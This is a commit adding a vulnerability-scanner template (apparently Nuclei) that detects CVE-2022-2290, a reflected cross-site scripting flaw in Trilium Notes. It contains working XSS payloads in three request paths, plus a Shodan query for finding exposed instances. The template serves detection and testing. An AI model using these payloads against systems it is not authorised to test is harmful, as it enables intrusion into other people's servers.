Merge pull request #4751 from dbrwsky/CVE-2022-2290

Added CVE-2022-2290 Template
2022-07-06 10:53:28 +05:30 · 2022-07-06 10:53:28 +05:30 · 649b5a13df
parent 8a6a708387 c958d58575
commit 649b5a13df
1 changed files with 40 additions and 0 deletions
--- a/cves/2022/CVE-2022-2290.yaml
+++ b/cves/2022/CVE-2022-2290.yaml
@ -0,0 +1,40 @@
+id: CVE-2022-2290
+
+info:
+  name: Trilium - Cross-Site Scripting
+  author: dbrwsky
+  severity: medium
+  description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.
+  reference:
+    - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
+    - https://github.com/zadam/trilium
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2290
+  metadata:
+    verified: true
+    shodan-query: title:"Trilium Notes"
+  tags: cve,cve2022,xss,trilium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
+      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
+      - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - 'No handler matched for custom <img src=x onerror=alert(document.domain)>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 404